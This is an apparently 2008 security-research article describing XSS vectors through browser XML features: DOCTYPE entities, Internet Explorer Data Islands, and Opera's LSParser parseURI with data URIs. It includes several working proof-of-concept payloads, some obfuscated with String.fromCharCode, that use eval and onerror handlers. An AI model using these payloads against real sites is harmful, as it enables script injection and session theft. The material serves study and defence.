Intro
Since the browser that changed it all was released in early 1999 most of the major payers in this section have been toying around with XML, processing, displaying and transforming it. Thus most browsers know one or a lot more ways to fetch data from other resources, work with DTDs and entities. Some of them are being shown and explained in this article.
Code
Firefox and all other major browsers but IE implemented an XML feature called XXE - XML eXternal Entities. Securiteam wrote about this issue many years ago and it found a kind of resurrection in the Google Caja Wiki. Basicaly XXE means it's possible to define entities for complete strings and markup stripes in the DOCTYPE area of the sites header.
<!DOCTYPE xss [ <!ENTITY x "<script>alert(this)</script>"> ] > <html xmlns="http://www.w3.org/1999/xhtml"> <head> &x; </head> </html>
Unfortunately is doesn't seem to be possible to inherit the entities from the site itself to embedded frames or IFrames. Otherwise it would have been possible to inject tons of script code with just a combination or &, some word characters and a semicolon.
Internet Explorer covers its ignorance against XXE with a feature called Data Islands. This allows to add a XML tag to the document linking to a resource containing valid XML. If the parser later on finds certain attributes in the DOM the data from the XML is being checked for a match and if everything fits right applied to the markup.
There are some basic security rules that forbid the data from the XML file to be applied to a script tag or escaping certain special chars before they are placed in the DOM - but that can be easily circumvented.
<html> <body> <xml id="xss" src="island.xml"></xml> <label onmouseover=eval(this.innerHTML) style=color:#fff;display:block;width:100%;height:100% datasrc=#xss datafld=payload>
Here we can see the corresponding XML data with embedded JavaScript code. Surprisingly this time IE had problems with parsing the data when being encoded to UTF-7 - we only managed to get the script code being executed in combination with ISO or UTF-8 encoding.
<?xml version="1.0"?> <x> <payload> document.write( String.fromCharCode( 60,105,109,103,32,115,114,99,61,120,32,111,110, 101,114,114,111,114,61,97,108,101,114,116,40,34, 88,83,83,34,41,62 ) ) </payload> </x>
When using the dataformatas parameter it's even possible to treat the incoming XML data as HTML. IE8 won't allow script tags but can be fooled to execute JavaScript code via img tag and error handler. Here's the markup:
<html> <body> <xml id="xss" src="island.xml"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> </body> </html>
Andthe corresponding Data Island code:
<?xml version="1.0"?> <x> <payload> <![CDATA[<img src=x onerror=alert(top)>>]]> </payload> </x>
Opera knows XXE as well as Safari and Chrome - but of course no Data Islands. But Opera also features another way of fetching XML content into the DOM. The function is called parseURI and is a method of the the LSParser class which is located in the document.implementation object. All those features are documented in the DOM Level 3 Load and Save specs.
<script> var parser = document.implementation.createLSParser(1, null); var mdlfile = parser.parseURI('data:;,<x>document.write(String.fromCharCode(88,83,83))</x>'); eval(mdlfile.documentElement.text) </script>
The method can neither access off-domain resources nor the file system, opera: or javascript: URIs. But dataURIs are allowed and thus the content of the string to parse can be chosen quite arbitrarily. Of course this time one can go all the ways and encode the string to UTF-7, base64 or whatever is necessary.
Conclusion
One might wonder that browser vendors are each and everyone brewing their own sub-standards and XML soups. Any solution has its flaws but no one besides the Opera allows to include data which is not located on the same domain. Once parseURI can be executed combined with a dataURI the possibilities are endless - and it's very hard to determine origin and content of the payload. For all other described variants one has to have at least an XML file lying around on the same domain.
It's 2008 right now and browser vendors seems to have learned what the cross domain border is. None of the techniques was able to download content from off-domain resources - except the dataURI issue with parseURI and Opera. Opera by the way features a lot more methods and properties inside the document.implementation object which we will shed more light on in later articles.